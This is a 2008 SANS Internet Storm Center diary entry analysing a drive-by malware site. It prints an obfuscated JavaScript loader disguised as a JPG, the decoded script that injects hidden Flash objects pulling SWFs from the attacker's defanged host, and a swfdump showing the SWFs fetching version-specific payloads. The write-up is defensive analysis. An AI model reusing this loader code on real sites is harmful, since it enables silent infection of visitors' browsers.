Tuesday, May 27, 2008 3:31 PM cmosby

Malicious swf files? - SANS Internet Storm Center

Malicious swf files?
Published: 2008-05-27,
Last Updated: 2008-05-27 18:46:44 UTC
by Adrien de Beaupre (Version: 2)
0 comment(s) digg_url = 'http://isc.sans.org/diary.html?storyid=4468&rss'; digg_title = 'Malicious swf files?'; digg_skin='compact'; digg_topic = 'security';

Marco and Eric wrote in to let us know of a potentially malicious site found at

hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.jpg

The JPG file is actually a script, shown below:

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=kCoffee||e(c)}k=[function(e){return dEmail}];e=function(){return'\\w+'};c=1};while(c--){if(kCoffee){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),kCoffee)}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r
A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="
6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))

Using spidermonkey, it decodes to:

if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
document.cookie="playon=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('</object>')}else{document.write
("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")}}

Lets get the swf files and see what they do, wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9

Virustotal shows 0/32 for both files.

Swftools can show us what the swf files do:
swfdump -D 08.swf
[HEADER]        File version: 9
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 208 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c00c]       138 DOACTION
                 (   99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/"
String:"ff.swf" String:"_root"
                 (    4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: DefineLocal
                 (    4 bytes) action: Push Lookup:2
("http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/")
Lookup:0 ("flashVersion")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:3 ("ff.swf")
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:4 ("_root")
                 (    0 bytes) action: GetVariable
                 (    1 bytes) action: GetUrl2 64
                 (    0 bytes) action: Stop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Running the swf files in a web browser gives me the following URLs:
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ff.swf
and
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ie.swf
Both of which got me a big fat 404.
Either the final files have been removed, or are looking for a different version of the player.

Thanks to Bojan and Jeremy for their help!

Unknown at this time if these SWF files are related to this vulnerability.

Cheers,
Adrien de Beaupre
Bell Canada

Keywords: malware swf
0 comment(s) Filed under: , , , ,

Comments

No Comments